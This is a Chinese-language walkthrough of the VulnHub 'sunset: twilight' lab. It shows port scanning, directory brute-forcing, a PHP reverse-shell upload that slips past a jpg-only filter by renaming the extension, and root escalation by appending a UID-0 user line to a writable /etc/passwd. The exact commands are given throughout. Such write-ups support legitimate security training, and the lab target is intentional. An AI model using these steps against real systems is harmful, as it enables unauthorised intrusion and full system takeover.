sunset: twilight靶场

发布于:2025-09-01 ⋅ 阅读:(13) ⋅ 点赞:(0)

sunset: twilight

来自 <sunset: twilight ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.145

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.145

22/tcp - SSH (OpenSSH 7.9p1 Debian 10)

  • 版本信息:OpenSSH 7.9p1,Debian 10 (Buster) 默认版本。
  • 潜在问题:弱口令/暴力破解,已知版本的远程代码执行漏洞可能较少,但可用于 爆破登录,获取用户凭证。

25/tcp - SMTP (Exim)

  • 服务器:Exim smtpd
  • 支持命令:AUTH、PIPELINING、CHUNKING,意味着支持邮件中继。
  • 潜在问题:
    • 开放中继 → 可测试是否允许未认证发件。
    • 漏洞历史:Exim 曾多次爆出 RCE 漏洞(例如 CVE-2019-15846)。

80/tcp - HTTP (Apache 2.4.38)

  • 系统:Apache 2.4.38 (Debian 10 默认版本)。
  • 返回结果:页面无标题,可能是默认站点或未配置。
  • 攻击面:
    • 目录扫描 → 寻找敏感路径(/phpmyadmin、/uploads 等)。
    • 已知漏洞 → Apache 2.4.38 存在多项 DoS / 权限提升漏洞。

139/445/tcp - SMB (Samba 4.9.5-Debian)

  • 提供 SMB 文件共享。
  • 信息泄露:
    • NetBIOS 名称:TWILIGHT
    • 工作组:WORKGROUP
    • 安全模式:消息签名未启用(危险)。
  • 攻击面:
    • 匿名共享 → 可尝试 smbclient -L 枚举。
    • Samba 4.9.x 存在漏洞(远程代码执行 CVE-2019-10197、信息泄露)。

2121/tcp - FTP (pyftpdlib 1.5.6)

  • 支持 匿名登录
  • 已发现文件:22253251-65325.twilight(可能是提示信息或关键凭证)。
  • 攻击面:
    • 匿名访问 → 枚举更多文件、尝试上传 webshell(若有写权限)。
    • pyftpdlib 默认情况下没有特别强的安全限制。

3306/tcp - MySQL (MariaDB 10.3.22)

  • 信息:
    • 认证插件:mysql_native_password
    • 已泄露 Salt:Te!p4Ooc#!x\Te}gi\o<` → 可用来做密码爆破。
  • 攻击面:
    • 弱口令爆破。
    • 若存在 Web 应用关联,可能通过数据库注入拿到权限。

8080/tcp & 63525/tcp - HTTP (PHP CLI Web Server)

  • 标识:Easy File Sharing Web Server 登录页面。
  • 攻击面:
    • 可能是弱口令/默认口令后台。
    • 该类文件共享系统常有 任意文件上传 / RCE 漏洞
    • http-open-proxy 显示可能存在代理功能 → 可被利用作跳板。

4,访问80端口开放的http服务

再扫描其子目录

dirsearch -u http://192.168.23.145 -x 403,404  

存在一个子目录,访问之

http://192.168.23.145/gallery/

允许上传文件,这里就上传kali自带的反弹shell木马

5,复制并且编辑木马反弹的IP和端口

cp /usr/share/webshells/php/php-reverse-shell.php shell.php

mousepad shell.php

这里只允许上传jpg文件,直接上传php文件会被拦截。这里就使用burpsuite,先上传shell.jpg再修改其后缀名

但是这里没有显示上传的文件再哪里,这就需要我们接续使用gobuster枚举扫描出来

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.23.145/gallery/   

http://192.168.23.145/gallery/original/

点击shell.php成功触发反弹shell,与此同时kali攻击机需要打开对4444端口的监听

成功getshell

6,python脚本获取一个可交互式脚本,再信息收集一下

python3 -c "import pty;pty.spawn('/bin/bash')"

再看看sudo提权操作是否可行

sudo命令需要密码,操作失败。但是发/etc/passwd所有用户可读可写

先在攻击机上生成一个密码 hash:
openssl passwd -1 123456

在靶机上编辑 /etc/passwd,添加一行:
echo 'hacker:$1$WIbcC9hq$kgWIRfc1/pdMOlvEXwc6K0:0:0:root:/root:/bin/bash' >> /etc/passwd

字段解释:

  • hacker → 用户名
  • :0:0: → UID=0、GID=0,即 root 权限
  • /root → home 目录
  • /bin/bash → shell

保存后你就可以直接登录:
su hacker

成功提权成为root用户,得到flag

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布